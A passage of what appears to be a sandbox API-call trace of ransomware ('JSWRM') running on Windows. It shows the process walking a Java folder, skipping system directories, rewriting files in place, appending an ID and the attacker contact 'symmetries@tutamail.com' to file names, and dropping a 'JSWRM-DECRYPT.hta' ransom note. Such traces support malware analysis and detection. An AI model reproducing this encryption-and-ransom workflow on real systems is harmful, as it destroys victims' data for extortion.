(lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.831] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=84355) returned 1 [0069.831] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14980) returned 0x24d1d8 [0069.831] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x14980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x14980, lpOverlapped=0x0) returned 1 [0069.837] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.837] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x14980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x14980, lpOverlapped=0x0) returned 1 [0069.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.839] CloseHandle (hObject=0x454) returned 1 [0069.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0069.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0069.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0069.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0069.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0069.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.839] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0069.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.840] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="cmm", cAlternateFileName="")) returned 1 [0069.840] lstrcmpiW (lpString1="cmm", lpString2=".") returned 1 [0069.840] lstrcmpiW (lpString1="cmm", lpString2="..") returned 1 [0069.840] lstrcmpiW (lpString1="cmm", lpString2="...") returned 1 [0069.840] lstrcmpiW (lpString1="cmm", lpString2="windows") returned -1 [0069.840] lstrcmpiW (lpString1="cmm", lpString2="recovery") returned -1 [0069.840] lstrcmpiW (lpString1="cmm", lpString2="perflogs") returned -1 [0069.840] lstrcmpiW (lpString1="cmm", lpString2="documents and settings") returned -1 [0069.840] lstrcmpiW (lpString1="cmm", lpString2="$RECYCLE.BIN") returned 1 [0069.840] lstrcmpiW (lpString1="cmm", lpString2="system volume information") returned -1 [0069.840] lstrcmpiW (lpString1="cmm", lpString2="msocache") returned -1 [0069.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0069.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0069.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.840] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\jswrm-decrypt.hta")) returned 0xffffffff [0069.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0069.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0069.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0069.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0069.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.864] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.866] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.866] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0069.867] CloseHandle (hObject=0x454) returned 1 [0069.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0069.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0069.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0069.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0069.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0069.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0069.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.868] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\jswrm-decrypt.hta")) returned 0x20 [0069.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0069.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0069.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0069.868] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x204e32fc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232000 [0069.868] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.868] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x204e32fc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0069.868] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.868] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.868] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc824, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="CIEXYZ.pf", cAlternateFileName="")) returned 1 [0069.868] lstrcmpiW (lpString1="CIEXYZ.pf", lpString2=".") returned 1 [0069.868] lstrcmpiW (lpString1="CIEXYZ.pf", lpString2="..") returned 1 [0069.868] lstrcmpiW (lpString1="CIEXYZ.pf", lpString2="...") returned 1 [0069.868] lstrcmpiW (lpString1="CIEXYZ.pf", lpString2="windows") returned -1 [0069.868] lstrcmpiW (lpString1="CIEXYZ.pf", lpString2="recovery") returned -1 [0069.868] lstrcmpiW (lpString1="CIEXYZ.pf", lpString2="perflogs") returned -1 [0069.868] lstrcmpiW (lpString1="CIEXYZ.pf", lpString2="documents and settings") returned -1 [0069.868] lstrcmpiW (lpString1="CIEXYZ.pf", lpString2="$RECYCLE.BIN") returned 1 [0069.868] lstrcmpiW (lpString1="CIEXYZ.pf", lpString2="system volume information") returned -1 [0069.868] lstrcmpiW (lpString1="CIEXYZ.pf", lpString2="msocache") returned -1 [0069.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0069.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CIEXYZ.pf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CIEXYZ.pf", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CIEXYZ.pf", lpUsedDefaultChar=0x0) returned 9 [0069.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0069.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CIEXYZ.pf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CIEXYZ.pf", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CIEXYZ.pf", lpUsedDefaultChar=0x0) returned 9 [0069.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0069.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.869] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.869] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=51236) returned 1 [0069.869] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc820) returned 0x24e1e0 [0069.869] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xc820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xc820, lpOverlapped=0x0) returned 1 [0069.874] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.874] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xc820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xc820, lpOverlapped=0x0) returned 1 [0069.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.874] CloseHandle (hObject=0x458) returned 1 [0069.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0069.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0069.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0069.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0069.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f158 [0069.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.875] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0069.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.875] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x278, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="GRAY.pf", cAlternateFileName="")) returned 1 [0069.875] lstrcmpiW (lpString1="GRAY.pf", lpString2=".") returned 1 [0069.875] lstrcmpiW (lpString1="GRAY.pf", lpString2="..") returned 1 [0069.875] lstrcmpiW (lpString1="GRAY.pf", lpString2="...") returned 1 [0069.875] lstrcmpiW (lpString1="GRAY.pf", lpString2="windows") returned -1 [0069.875] lstrcmpiW (lpString1="GRAY.pf", lpString2="recovery") returned -1 [0069.876] lstrcmpiW (lpString1="GRAY.pf", lpString2="perflogs") returned -1 [0069.876] lstrcmpiW (lpString1="GRAY.pf", lpString2="documents and settings") returned 1 [0069.876] lstrcmpiW (lpString1="GRAY.pf", lpString2="$RECYCLE.BIN") returned 1 [0069.876] lstrcmpiW (lpString1="GRAY.pf", lpString2="system volume information") returned -1 [0069.876] lstrcmpiW (lpString1="GRAY.pf", lpString2="msocache") returned -1 [0069.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAY.pf", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAY.pf", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAY.pf", lpUsedDefaultChar=0x0) returned 7 [0069.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAY.pf", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAY.pf", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAY.pf", lpUsedDefaultChar=0x0) returned 7 [0069.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.876] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.876] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=632) returned 1 [0069.877] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x203550 [0069.877] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0069.878] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.878] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0069.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0069.878] CloseHandle (hObject=0x458) returned 1 [0069.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0069.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0069.878] RtlAllocateHeap 